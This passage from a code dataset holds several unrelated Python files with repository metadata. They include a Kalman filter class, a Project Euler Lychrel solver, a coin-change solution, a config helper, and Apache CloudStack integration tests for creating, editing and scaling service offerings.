const.MRT_BOX_GRASS,  # Heroic herbalism crate\n    '184638': const.MRT_BOX_FISH,  # Heroic fish crate\n    '184637': const.MRT_BOX_MEAT,  # Heroic meat crate\n    '184648': const.MRT_BOX_MAGIC,  # Heroic enchanting crate\n    '184645': const.MRT_BOX_LEATHER,  # Heroic skinning crate\n    '184644': const.MRT_BOX_CLOTH,  # Heroic tailoring crate\n}\n\n","repo_name":"tqqq/ventureplan-assistant","sub_path":"vp_manager/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39839928359","text":"import numpy as np\nfrom filterpy.kalman import KalmanFilter as KF\n\n\nclass KalmanFilter():\n    def __init__(self, initial_state=np.array([0., 0., 0., 0]),\n                 dt=1/20.,\n                 measurement_uncertainty_x=2,\n                 measurement_uncertainty_y=2,\n                 process_uncertainty=1,\n                 verbose=False, frame=1):\n        self.name = \"KalmanFilter\"\n        self.verbose = verbose\n        self.kf = KF(dim_x=4, dim_z=2)\n\n        self.kf.x = initial_state  # state (x and dx)\n        self.process_uncertainty = process_uncertainty\n        self.measurement_uncertainty_x = measurement_uncertainty_x\n        self.measurement_uncertainty_y = measurement_uncertainty_y\n        self.frame = frame\n        self.frames = []\n        self.kf.F = np.array([[1, 0, dt, 0],\n                              [0, 1, 0, dt],\n                              [0, 0, 1, 0],\n                              [0, 0, 0, 1]])  # state transition matrix\n\n        self.kf.H = np.array([[1., 0., 0., 0.],\n                              [0., 1., 0., 0.]])  # Measurement function\n\n        self.kf.R = np.array([[self.measurement_uncertainty_x**2, 0],\n                              [0, self.measurement_uncertainty_y**2]])\n        self.Q = np.array([\n            [(dt**4)/4, 0, (dt**3)/2, 0],\n            [0, (dt**4)/4, 0, (dt**3)/2],\n            [(dt**3)/2, 0, dt**2, 0],\n            [0, (dt**3)/2, 0, dt**2]\n        ])\n        self.kf.Q = self.Q * self.process_uncertainty\n        if self.verbose:\n            print(\"Initializing Kalman Filter:\\ndf = {dt}\".format(dt=dt))\n\n    def update_process_uncertainty(self):\n        self.kf.Q = self.Q * self.process_uncertainty\n\n    def update_measurement_uncertainty(self):\n        self.kf.R = np.array([[self.measurement_uncertainty_x**2, 0],\n                              [0, self.measurement_uncertainty_y**2]])\n\n    def increase_process_uncertainty(self, alpha=0.01):\n        self.process_uncertainty *= (1 + alpha)\n\n    def decrease_process_uncertainty(self, alpha=0.01):\n        self.process_uncertainty *= (1 - alpha)\n\n    def smooth(self, zs, decrease_process_uncertainty=False, occluded=[]):\n\n        smoothed_trajectory = []\n        predicted_trajectory = []\n        for i, z 
in enumerate(zs):\n if len(occluded) > 0:\n\n if occluded[i]:\n\n self.measurement_uncertainty_x = 0.1\n self.measurement_uncertainty_y = 0.1\n self.process_uncertainty = 0.1\n\n else:\n self.measurement_uncertainty_x = 0.1\n self.measurement_uncertainty_y = 0.1\n self.process_uncertainty = 0.1\n self.update_measurement_uncertainty()\n self.kf.predict()\n predicted_trajectory.append(\n np.array([[self.kf.x[0], self.kf.x[1]]]))\n\n if not np.isnan(z[0]):\n\n self.kf.update(z)\n smoothed_trajectory.append(\n np.array([[self.kf.x[0], self.kf.x[1]]]))\n\n if decrease_process_uncertainty:\n self.decrease_process_uncertainty()\n self.update_process_uncertainty()\n\n return np.concatenate(smoothed_trajectory), np.concatenate(predicted_trajectory)\n\n def step(self, z, decrease_process_uncertainty=False, frame=None):\n if frame > self.frame:\n self.kf.predict()\n pred_x = self.kf.x\n assert frame not in self.frames\n self.update(z, frame=frame)\n if decrease_process_uncertainty:\n self.decrease_process_uncertainty()\n self.update_process_uncertainty()\n\n def predict(self, frame=None, increase_process_uncertainty=False):\n if increase_process_uncertainty:\n self.increase_process_uncertainty()\n self.update_process_uncertainty()\n self.kf.predict()\n self.frame = frame\n x = np.expand_dims(self.kf.x[:2], axis=0)\n\n return x\n\n def update(self, x, frame=None):\n self.kf.update(x)\n if frame is not None:\n self.frames.append(frame)\n\n def predictSequence(self, time):\n output = []\n for t in time:\n output.append(self.predict())\n return np.concatenate(output)\n","repo_name":"dendorferpatrick/QuoVadis","sub_path":"src/quovadis/trajectory_predictor/kalman_filter.py","file_name":"kalman_filter.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"32"} +{"seq_id":"18005206252","text":"import util\n\n_lychrels = {}\ndef is_lychrel(n, iteration):\n # consider it lychrel if it's the 50th iteration\n if iteration >= 50:\n _lychrels[n] = True\n # if it's a palindrome and it's the sum of another number and its reverse,\n # return False\n elif iteration > 0 and util.is_palindrome(str(n)):\n _lychrels[n] = False\n # if we already know this to be a lychrel number, we return True\n elif _lychrels.get(n):\n pass\n # otherwise, we have no idea yet\n else:\n # let's try this again\n _lychrels[n] = is_lychrel(n + int(str(n)[::-1]), iteration + 1)\n return _lychrels[n]\n\ndef solve():\n count = 0\n for n in range(9999, 0, -1):\n if is_lychrel(n, 0):\n count += 1\n #print n, \"is lychrel\"\n print(count, \"total lychrels\")\n\nif __name__ == \"__main__\":\n solve()\n #pass\n","repo_name":"indraastra/puzzles","sub_path":"euler/prob055.py","file_name":"prob055.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7699671078","text":"class Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n \n def dfs(coins, idx, amount, dp):\n \n if amount == 0:\n return 0\n \n if idx >= len(coins):\n return float('inf')\n \n key = \"{}-{}\".format(idx, amount)\n \n if key not in dp:\n include = float('inf')\n if coins[idx] <= amount:\n temp = dfs(coins, idx, amount - coins[idx], dp)\n if temp != float('inf'):\n include = 1 + temp\n\n skip = dfs(coins, idx+1, amount, dp)\n\n dp[key] = min(include, skip)\n \n return dp[key]\n \n dp = {}\n ans = dfs(coins, 0, amount, dp)\n return ans if ans != float('inf') else 
-1","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/39.py","file_name":"39.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70932122651","text":"import os\nimport yaml\n\nclass Section(object):\n def __init__(self, nm, parent=None):\n self.name = nm\n self.parent = parent\n self.attrs = {}\n self.sections = {}\n\n def _get_subsection(self, nm):\n return self.sections.get(nm)\n\n def _add_subsection(self, s):\n self.sections[s.name] = s\n\n def update_attrs(self, attrs):\n self.attrs.update(attrs)\n\n def _validate(self, c):\n for s in self.sections.values():\n c = self.config.get(s.name, {})\n if not isinstance(c, dict):\n raise TypeError(\"Section is not dict\")\n s._validate(c)\n\n for nm, a in self.attrs.items():\n a.validate(c, nm)\n\n def get_attribute(self, nm, c):\n if nm not in self.attrs:\n raise KeyError(nm)\n\n self.attrs[nm].get_from(c, nm)\n\nclass Config(object):\n def __init__(self, path=None):\n if path is None:\n if 'INTRUSTD_APPLIANCE_DIR' in os.environ:\n self.path = os.path.join(os.environ['INTRUSTD_APPLIANCE_DIR'], 'config.yaml')\n else:\n raise TypeError(\"expected 'path' argument or 'INTRUSTD_APPLIANCE_DIR' environment variable\")\n\n self.sections = {}\n\n def open(self):\n try:\n with open(path, \"rt\") as f:\n self.config = yaml.load(f)\n except FileNotFoundError:\n self.config = {}\n\n self._validate()\n\n def _validate(self):\n for s in self.sections.values():\n c = self.config.get(s.name, {})\n if not isinstance(c, dict):\n raise TypeError(\"Section is not dict\")\n s._validate(c)\n\n def _split_key(self, key):\n return key.split('.')\n\n def _is_internal_identifier(self, key):\n return key.startswith('_')\n\n def __getitem__(self, key):\n if not hasattr(self, 'config'):\n raise TypeError(\"Config not open()ed\")\n\n key = self._split_key(key)\n section = key[:-1]\n\n cur = self.config\n cur_section = self\n p = []\n for s in section:\n p.append(s)\n s = cur_section._get_subsection(s)\n if s is None:\n raise KeyError('.'.join(p))\n\n cur = cur.get(s.name, {})\n\n return cur_section.get_attribute(key, cur)\n\n def _make_section(self, nms):\n cur = self\n for nm in nms:\n cur = self._get_subsection(nm)\n if cur is None:\n self._add_subsection(Section(nm, parent=cur))\n cur = self._get_subsection(nm)\n return cur\n\n def _get_subsection(self, nm):\n return self.sections.get(nm)\n\n def _add_subsection(self, s):\n self.sections[s.name] = s\n\n def section(self, nm):\n nm = self._split_key(nm)\n\n def mksection(cls):\n section = self._make_section(nm)\n attrs = [k for k in dir(cls) if not self._is_internal_identifier(k)]\n section.update_attrs(dict((attr, getattr(cls, attr)) for attr in attrs))\n\n return mksection\n","repo_name":"intrustd/admin","sub_path":"intrustd/admin/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33779635425","text":"from marvin.codes import FAILED\nfrom marvin.cloudstackTestCase import cloudstackTestCase\nfrom marvin.cloudstackAPI import (scaleVirtualMachine,\n updateServiceOffering)\nfrom marvin.lib.utils import (isAlmostEqual,\n cleanup_resources,\n random_gen)\nfrom marvin.lib.base import (ServiceOffering,\n Configurations,\n DiskOffering,\n Account,\n StoragePool,\n VirtualMachine)\nfrom marvin.lib.common import (list_service_offering,\n list_virtual_machines,\n get_domain,\n 
get_zone,\n get_test_template,\n list_hosts)\nfrom nose.plugins.attrib import attr\n\nimport time\nfrom marvin.sshClient import SshClient\nfrom marvin.lib.decoratorGenerators import skipTestIf\n\n_multiprocess_shared_ = True\n\n\nclass TestCreateServiceOffering(cloudstackTestCase):\n\n def setUp(self):\n self.apiclient = self.testClient.getApiClient()\n self.dbclient = self.testClient.getDbConnection()\n self.cleanup = []\n self.services = self.testClient.getParsedTestDataConfig()\n\n def tearDown(self):\n try:\n # Clean up, terminate the created templates\n cleanup_resources(self.apiclient, self.cleanup)\n\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\", \"diskencrypt\"],\n required_hardware=\"false\")\n def test_01_create_service_offering(self):\n \"\"\"Test to create service offering\"\"\"\n\n # Validate the following:\n # 1. createServiceOfferings should return a valid information\n # for newly created offering\n # 2. The Cloud Database contains the valid information\n\n service_offering = ServiceOffering.create(\n self.apiclient,\n self.services[\"service_offerings\"][\"tiny\"]\n )\n self.cleanup.append(service_offering)\n\n self.debug(\n \"Created service offering with ID: %s\" %\n service_offering.id)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=service_offering.id\n )\n self.assertEqual(\n isinstance(list_service_response, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n self.assertNotEqual(\n len(list_service_response),\n 0,\n \"Check Service offering is created\"\n )\n\n self.assertEqual(\n list_service_response[0].cpunumber,\n self.services[\"service_offerings\"][\"tiny\"][\"cpunumber\"],\n \"Check server id in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].cpuspeed,\n self.services[\"service_offerings\"][\"tiny\"][\"cpuspeed\"],\n \"Check cpuspeed in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].displaytext,\n self.services[\"service_offerings\"][\"tiny\"][\"displaytext\"],\n \"Check server displaytext in createServiceOfferings\"\n )\n self.assertEqual(\n list_service_response[0].memory,\n self.services[\"service_offerings\"][\"tiny\"][\"memory\"],\n \"Check memory in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].name,\n self.services[\"service_offerings\"][\"tiny\"][\"name\"],\n \"Check name in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].encryptroot,\n False,\n \"Ensure encrypt is false by default\"\n )\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\"],\n required_hardware=\"false\")\n def test_02_create_iops_offering(self):\n \"\"\"Test to create service io burst offering\"\"\"\n\n # Validate the following:\n # 1. createServiceOfferings should return a valid information\n # for newly created offering\n # 2. 
The Cloud Database contains the valid information\n\n\n\n svcs = self.services[\"service_offerings\"][\"tiny\"]\n kws = {}\n\n for key in self.services[\"ioburst\"]:\n if str(key).startswith(\"bytes\") or str(key).startswith(\"iops\"):\n kws[key] = self.services[\"ioburst\"][key]\n else:\n svcs[key] = self.services[\"ioburst\"][key]\n\n service_offering = ServiceOffering.create(\n self.apiclient,\n svcs,\n None,\n None,\n **kws\n )\n self.cleanup.append(service_offering)\n\n self.debug(\n \"Created service offering with ID: %s\" %\n service_offering.id)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=service_offering.id\n )\n self.assertEqual(\n isinstance(list_service_response, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n self.assertNotEqual(\n len(list_service_response),\n 0,\n \"Check Service offering is created\"\n )\n\n for key in kws:\n k = str(key)\n mapped = 'disk' + k[:1].upper() + k[1:]\n self.assertEqual(\n list_service_response[0][mapped],\n kws[key],\n \"Check \" + str(key) + \" => \" + str(mapped) + \" in createServiceOffering\"\n )\n\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\"],\n required_hardware=\"false\")\n def test_03_create_service_offering_with_cache_mode_type(self):\n \"\"\"Test to create service offering with each one of the valid cache mode types : none, writeback and writethrough\"\"\"\n\n # Validate the following:\n # 1. createServiceOfferings should return a valid information\n # for newly created offering\n # 2. The Cloud Database contains the valid information\n\n cache_mode_types=[\"none\", \"writeback\", \"writethrough\"]\n for i in range(3):\n service_offering = ServiceOffering.create(\n self.apiclient,\n self.services[\"service_offerings\"][\"tiny\"],\n cacheMode=cache_mode_types[i]\n )\n self.cleanup.append(service_offering)\n\n self.debug(\n \"Created service offering with ID: %s\" %\n service_offering.id)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=service_offering.id\n )\n self.assertEqual(\n isinstance(list_service_response, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n self.assertNotEqual(\n len(list_service_response),\n 0,\n \"Check Service offering is created\"\n )\n\n self.assertEqual(\n list_service_response[0].cpunumber,\n self.services[\"service_offerings\"][\"tiny\"][\"cpunumber\"],\n \"Check server id in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].cpuspeed,\n self.services[\"service_offerings\"][\"tiny\"][\"cpuspeed\"],\n \"Check cpuspeed in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].displaytext,\n self.services[\"service_offerings\"][\"tiny\"][\"displaytext\"],\n \"Check server displaytext in createServiceOfferings\"\n )\n self.assertEqual(\n list_service_response[0].memory,\n self.services[\"service_offerings\"][\"tiny\"][\"memory\"],\n \"Check memory in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].name,\n self.services[\"service_offerings\"][\"tiny\"][\"name\"],\n \"Check name in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].cacheMode,\n cache_mode_types[i],\n \"Check cacheMode in createServiceOffering\"\n )\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\"],\n required_hardware=\"false\")\n def test_04_create_service_offering_with_invalid_cache_mode_type(self):\n \"\"\"Test to create service 
offering with invalid cache mode type\"\"\"\n\n # Validate the following:\n # 1. createServiceOfferings should return a valid information\n # for newly created offering\n # 2. The Cloud Database contains the valid information\n\n with self.assertRaises(Exception):\n service_offering = ServiceOffering.create(\n self.apiclient,\n self.services[\"service_offerings\"][\"tiny\"],\n cacheMode=\"invalid_cache_mode_type\"\n )\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\",\n \"diskencrypt\"],\n required_hardware=\"false\")\n def test_05_create_service_offering_with_root_encryption_type(self):\n \"\"\"Test to create service offering with root encryption\"\"\"\n\n # Validate the following:\n # 1. createServiceOfferings should return a valid information\n # for newly created offering\n\n service_offering = ServiceOffering.create(\n self.apiclient,\n self.services[\"service_offerings\"][\"tiny\"],\n name=\"tiny-encrypted-root\",\n encryptRoot=True\n )\n self.cleanup.append(service_offering)\n\n self.debug(\n \"Created service offering with ID: %s\" %\n service_offering.id)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=service_offering.id\n )\n\n self.assertNotEqual(\n len(list_service_response),\n 0,\n \"Check Service offering is created\"\n )\n\n self.assertEqual(\n list_service_response[0].encryptroot,\n True,\n \"Check encrypt root is true\"\n )\n return\n\n\nclass TestServiceOfferings(cloudstackTestCase):\n\n def setUp(self):\n self.apiclient = self.testClient.getApiClient()\n self.dbclient = self.testClient.getDbConnection()\n self.cleanup = []\n\n def tearDown(self):\n try:\n # Clean up, terminate the created templates\n cleanup_resources(self.apiclient, self.cleanup)\n\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n\n return\n\n @classmethod\n def setUpClass(cls):\n testClient = super(TestServiceOfferings, cls).getClsTestClient()\n cls.apiclient = testClient.getApiClient()\n cls.services = testClient.getParsedTestDataConfig()\n cls.hypervisor = testClient.getHypervisorInfo()\n\n domain = get_domain(cls.apiclient)\n cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())\n cls.services['mode'] = cls.zone.networktype\n\n cls.service_offering_1 = ServiceOffering.create(\n cls.apiclient,\n cls.services[\"service_offerings\"][\"tiny\"]\n )\n cls.service_offering_2 = ServiceOffering.create(\n cls.apiclient,\n cls.services[\"service_offerings\"][\"tiny\"]\n )\n cls.template = get_test_template(\n cls.apiclient,\n cls.zone.id,\n cls.hypervisor\n )\n if cls.template == FAILED:\n assert False, \"get_test_template() failed to return template\"\n\n # Set Zones and disk offerings\n cls.services[\"small\"][\"zoneid\"] = cls.zone.id\n cls.services[\"small\"][\"template\"] = cls.template.id\n\n\n # Create VMs, NAT Rules etc\n cls.account = Account.create(\n cls.apiclient,\n cls.services[\"account\"],\n domainid=domain.id\n )\n\n cls.small_offering = ServiceOffering.create(\n cls.apiclient,\n cls.services[\"service_offerings\"][\"small\"]\n )\n\n cls.medium_offering = ServiceOffering.create(\n cls.apiclient,\n cls.services[\"service_offerings\"][\"medium\"]\n )\n cls.medium_virtual_machine = VirtualMachine.create(\n cls.apiclient,\n cls.services[\"small\"],\n accountid=cls.account.name,\n domainid=cls.account.domainid,\n serviceofferingid=cls.medium_offering.id,\n mode=cls.services[\"mode\"]\n )\n cls._cleanup = [\n cls.small_offering,\n cls.medium_offering,\n 
cls.account\n ]\n return\n\n @classmethod\n def tearDownClass(cls):\n try:\n cls.apiclient = super(\n TestServiceOfferings,\n cls).getClsTestClient().getApiClient()\n # Clean up, terminate the created templates\n cleanup_resources(cls.apiclient, cls._cleanup)\n\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\"],\n required_hardware=\"false\")\n def test_02_edit_service_offering(self):\n \"\"\"Test to update existing service offering\"\"\"\n\n # Validate the following:\n # 1. updateServiceOffering should return\n # a valid information for newly created offering\n\n # Generate new name & displaytext from random data\n random_displaytext = random_gen()\n random_name = random_gen()\n random_tag = random_gen()\n random_hosttag = random_gen()\n\n self.debug(\"Updating service offering with ID: %s\" %\n self.service_offering_1.id)\n\n cmd = updateServiceOffering.updateServiceOfferingCmd()\n # Add parameters for API call\n cmd.id = self.service_offering_1.id\n cmd.displaytext = random_displaytext\n cmd.name = random_name\n cmd.storagetags = random_tag\n cmd.hosttags = random_hosttag\n self.apiclient.updateServiceOffering(cmd)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=self.service_offering_1.id\n )\n self.assertEqual(\n isinstance(list_service_response, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n self.assertNotEqual(\n len(list_service_response),\n 0,\n \"Check Service offering is updated\"\n )\n\n self.assertEqual(\n list_service_response[0].displaytext,\n random_displaytext,\n \"Check server displaytext in updateServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].name,\n random_name,\n \"Check server name in updateServiceOffering\"\n )\n\n self.assertEqual(\n list_service_response[0].storagetags,\n random_tag,\n \"Check storage tags in updateServiceOffering\"\n )\n\n self.assertEqual(\n list_service_response[0].hosttags,\n random_hosttag,\n \"Check host tags in updateServiceOffering\"\n )\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\"],\n required_hardware=\"false\")\n def test_03_delete_service_offering(self):\n \"\"\"Test to delete service offering\"\"\"\n\n # Validate the following:\n # 1. deleteServiceOffering should return\n # a valid information for newly created offering\n\n self.debug(\"Deleting service offering with ID: %s\" %\n self.service_offering_2.id)\n\n self.service_offering_2.delete(self.apiclient)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=self.service_offering_2.id\n )\n\n self.assertEqual(\n list_service_response,\n None,\n \"Check if service offering exists in listDiskOfferings\"\n )\n\n return\n\n @attr(tags=[\"advanced\", \"advancedns\", \"smoke\"], required_hardware=\"true\")\n def test_04_change_offering_small(self):\n \"\"\"Test to change service to a small capacity\n \"\"\"\n # Validate the following\n # 1. Log in to the Vm .We should see that the CPU and memory Info of\n # this Vm matches the one specified for \"Small\" service offering.\n # 2. 
Using listVM command verify that this Vm\n # has Small service offering Id.\n\n if self.hypervisor.lower() == \"lxc\":\n self.skipTest(\"Skipping this test for {} due to bug CS-38153\".format(self.hypervisor))\n try:\n self.medium_virtual_machine.stop(self.apiclient)\n\n timeout = self.services[\"timeout\"]\n\n while True:\n time.sleep(self.services[\"sleep\"])\n\n # Ensure that VM is in stopped state\n list_vm_response = list_virtual_machines(\n self.apiclient,\n id=self.medium_virtual_machine.id\n )\n\n if isinstance(list_vm_response, list):\n vm = list_vm_response[0]\n if vm.state == 'Stopped':\n self.debug(\"VM state: %s\" % vm.state)\n break\n\n if timeout == 0:\n raise Exception(\n \"Failed to stop VM (ID: %s) in change service offering\" % vm.id)\n\n timeout = timeout - 1\n except Exception as e:\n self.fail(\"Failed to stop VM: %s\" % e)\n\n cmd = scaleVirtualMachine.scaleVirtualMachineCmd()\n cmd.id = self.medium_virtual_machine.id\n cmd.serviceofferingid = self.small_offering.id\n self.apiclient.scaleVirtualMachine(cmd)\n\n self.debug(\"Starting VM - ID: %s\" % self.medium_virtual_machine.id)\n self.medium_virtual_machine.start(self.apiclient)\n # Ensure that VM is in running state\n list_vm_response = list_virtual_machines(\n self.apiclient,\n id=self.medium_virtual_machine.id\n )\n\n if isinstance(list_vm_response, list):\n vm = list_vm_response[0]\n if vm.state == 'Running':\n self.debug(\"VM state: %s\" % vm.state)\n else:\n raise Exception(\n \"Failed to start VM (ID: %s) after changing\\\n service offering\" % vm.id)\n\n try:\n ssh = self.medium_virtual_machine.get_ssh_client()\n except Exception as e:\n self.fail(\n \"SSH Access failed for %s: %s\" %\n (self.medium_virtual_machine.ipaddress, e)\n )\n\n cpuinfo = ssh.execute(\"cat /proc/cpuinfo\")\n cpu_cnt = len([i for i in cpuinfo if \"processor\" in i])\n # 'cpu MHz\\t\\t: 2660.499'\n cpu_speed = [i for i in cpuinfo if \"cpu MHz\" in i][0].split()[3]\n meminfo = ssh.execute(\"cat /proc/meminfo\")\n # MemTotal: 1017464 kB\n total_mem = [i for i in meminfo if \"MemTotal\" in i][0].split()[1]\n\n self.debug(\n \"CPU count: %s, CPU Speed: %s, Mem Info: %s\" % (\n cpu_cnt,\n cpu_speed,\n total_mem\n ))\n self.assertAlmostEqual(\n int(cpu_cnt),\n self.small_offering.cpunumber,\n \"Check CPU Count for small offering\"\n )\n self.assertAlmostEqual(\n list_vm_response[0].cpuspeed,\n self.small_offering.cpuspeed,\n \"Check CPU Speed for small offering\"\n )\n\n range = 25\n if self.hypervisor.lower() == \"hyperv\":\n range = 200\n # TODO: Find the memory allocated to VM on hyperv hypervisor using\n # powershell commands and use that value to equate instead of\n # manipulating range, currently we get the memory count much less\n # because of the UI component\n self.assertTrue(\n isAlmostEqual(int(int(total_mem) / 1024),\n int(self.small_offering.memory),\n range=range\n ),\n \"Check Memory(kb) for small offering\"\n )\n return\n\n @attr(tags=[\"advanced\", \"advancedns\", \"smoke\"], required_hardware=\"true\")\n def test_05_disk_offering_strictness_true(self):\n \"\"\"Test to see change service offering is not possible when disk offering strictness is set to true\n \"\"\"\n # Validate the following\n # 1. Create service offering linked a disk offering and disk offering strictness is true\n # 2. Create a VM with that service offering\n # 3. Create another service offering with a different disk offering\n # 4. 
Try change service offering for VM and it will fail since disk offering strictness is true (not allowed to change the disk offering)\n\n if self.hypervisor.lower() == \"lxc\":\n self.skipTest(\"Skipping this test for {} due to bug CS-38153\".format(self.hypervisor))\n offering_data = {\n 'displaytext': 'TestDiskOfferingStrictnessTrue',\n 'cpuspeed': 512,\n 'cpunumber': 2,\n 'name': 'TestDiskOfferingStrictnessTrue',\n 'memory': 1024,\n 'diskofferingstrictness': True\n }\n\n self.serviceOfferingWithDiskOfferingStrictnessTrue = ServiceOffering.create(\n self.apiclient,\n offering_data,\n )\n self._cleanup.append(self.serviceOfferingWithDiskOfferingStrictnessTrue)\n\n self.virtual_machine_with_diskoffering_strictness_true = VirtualMachine.create(\n self.apiclient,\n self.services[\"small\"],\n accountid=self.account.name,\n domainid=self.account.domainid,\n serviceofferingid=self.serviceOfferingWithDiskOfferingStrictnessTrue.id,\n mode=self.services[\"mode\"]\n )\n\n try:\n self.virtual_machine_with_diskoffering_strictness_true.stop(self.apiclient)\n\n timeout = self.services[\"timeout\"]\n\n while True:\n time.sleep(self.services[\"sleep\"])\n\n # Ensure that VM is in stopped state\n list_vm_response = list_virtual_machines(\n self.apiclient,\n id=self.virtual_machine_with_diskoffering_strictness_true.id\n )\n\n if isinstance(list_vm_response, list):\n vm = list_vm_response[0]\n if vm.state == 'Stopped':\n self.debug(\"VM state: %s\" % vm.state)\n break\n\n if timeout == 0:\n raise Exception(\n \"Failed to stop VM (ID: %s) in change service offering\" % vm.id)\n\n timeout = timeout - 1\n except Exception as e:\n self.fail(\"Failed to stop VM: %s\" % e)\n\n offering_data = {\n 'displaytext': 'TestDiskOfferingStrictnessTrue2',\n 'cpuspeed': 1000,\n 'cpunumber': 2,\n 'name': 'TestDiskOfferingStrictnessTrue2',\n 'memory': 1024,\n 'diskofferingstrictness': True\n }\n\n self.serviceOfferingWithDiskOfferingStrictnessTrue2 = ServiceOffering.create(\n self.apiclient,\n offering_data,\n )\n self._cleanup.append(self.serviceOfferingWithDiskOfferingStrictnessTrue2)\n cmd = scaleVirtualMachine.scaleVirtualMachineCmd()\n cmd.id = self.virtual_machine_with_diskoffering_strictness_true.id\n cmd.serviceofferingid = self.serviceOfferingWithDiskOfferingStrictnessTrue2.id\n\n with self.assertRaises(Exception) as e:\n self.apiclient.scaleVirtualMachine(cmd)\n self.debug(\"Upgrade VM with new service offering having different disk offering operation failed as expected with exception: %s\" %\n e.exception)\n return\n\n @attr(tags=[\"advanced\", \"advancedns\", \"smoke\"], required_hardware=\"true\")\n def test_06_disk_offering_strictness_false(self):\n \"\"\"Test to see change service offering is possible when disk offering strictness is set to false\n \"\"\"\n # Validate the following\n # 1. Create service offering linked a disk offering and disk offering strictness is false\n # 2. Create a VM with that service offering\n # 3. Create another service offering with a different disk offering and disk offering strictness is false\n # 4. 
Try change service offering for VM should succeed\n\n if self.hypervisor.lower() == \"lxc\":\n self.skipTest(\"Skipping this test for {} due to bug CS-38153\".format(self.hypervisor))\n self.storeCloneValues = {}\n if self.hypervisor.lower() == \"vmware\":\n self.fullClone = Configurations.list(self.apiclient, name=\"vmware.create.full.clone\")\n assert isinstance(self.fullClone, list), \"Config list not retrieved for vmware.create.full.clone\"\n allStoragePools = StoragePool.list(\n self.apiclient\n )\n for pool in allStoragePools:\n self.storeCloneValues[pool.id] = Configurations.list(self.apiclient, name=\"vmware.create.full.clone\", storageid=pool.id)[0].value.lower()\n self.updateVmwareCreateFullCloneSetting(False)\n\n offering_data = {\n 'displaytext': 'TestDiskOfferingStrictnessFalse',\n 'cpuspeed': 512,\n 'cpunumber': 2,\n 'name': 'TestDiskOfferingStrictnessFalse',\n 'memory': 1024,\n 'diskofferingstrictness': False\n }\n\n self.serviceOfferingWithDiskOfferingStrictnessFalse = ServiceOffering.create(\n self.apiclient,\n offering_data,\n )\n self._cleanup.append(self.serviceOfferingWithDiskOfferingStrictnessFalse)\n\n self.virtual_machine_with_diskoffering_strictness_false = VirtualMachine.create(\n self.apiclient,\n self.services[\"small\"],\n accountid=self.account.name,\n domainid=self.account.domainid,\n serviceofferingid=self.serviceOfferingWithDiskOfferingStrictnessFalse.id,\n mode=self.services[\"mode\"]\n )\n\n try:\n self.virtual_machine_with_diskoffering_strictness_false.stop(self.apiclient)\n\n timeout = self.services[\"timeout\"]\n\n while True:\n time.sleep(self.services[\"sleep\"])\n\n # Ensure that VM is in stopped state\n list_vm_response = list_virtual_machines(\n self.apiclient,\n id=self.virtual_machine_with_diskoffering_strictness_false.id\n )\n\n if isinstance(list_vm_response, list):\n vm = list_vm_response[0]\n if vm.state == 'Stopped':\n self.debug(\"VM state: %s\" % vm.state)\n break\n\n if timeout == 0:\n raise Exception(\n \"Failed to stop VM (ID: %s) in change service offering\" % vm.id)\n\n timeout = timeout - 1\n except Exception as e:\n self.fail(\"Failed to stop VM: %s\" % e)\n\n self.disk_offering2 = DiskOffering.create(\n self.apiclient,\n self.services[\"disk_offering\"],\n )\n self._cleanup.append(self.disk_offering2)\n offering_data = {\n 'displaytext': 'TestDiskOfferingStrictnessFalse2',\n 'cpuspeed': 1000,\n 'cpunumber': 2,\n 'name': 'TestDiskOfferingStrictnessFalse2',\n 'memory': 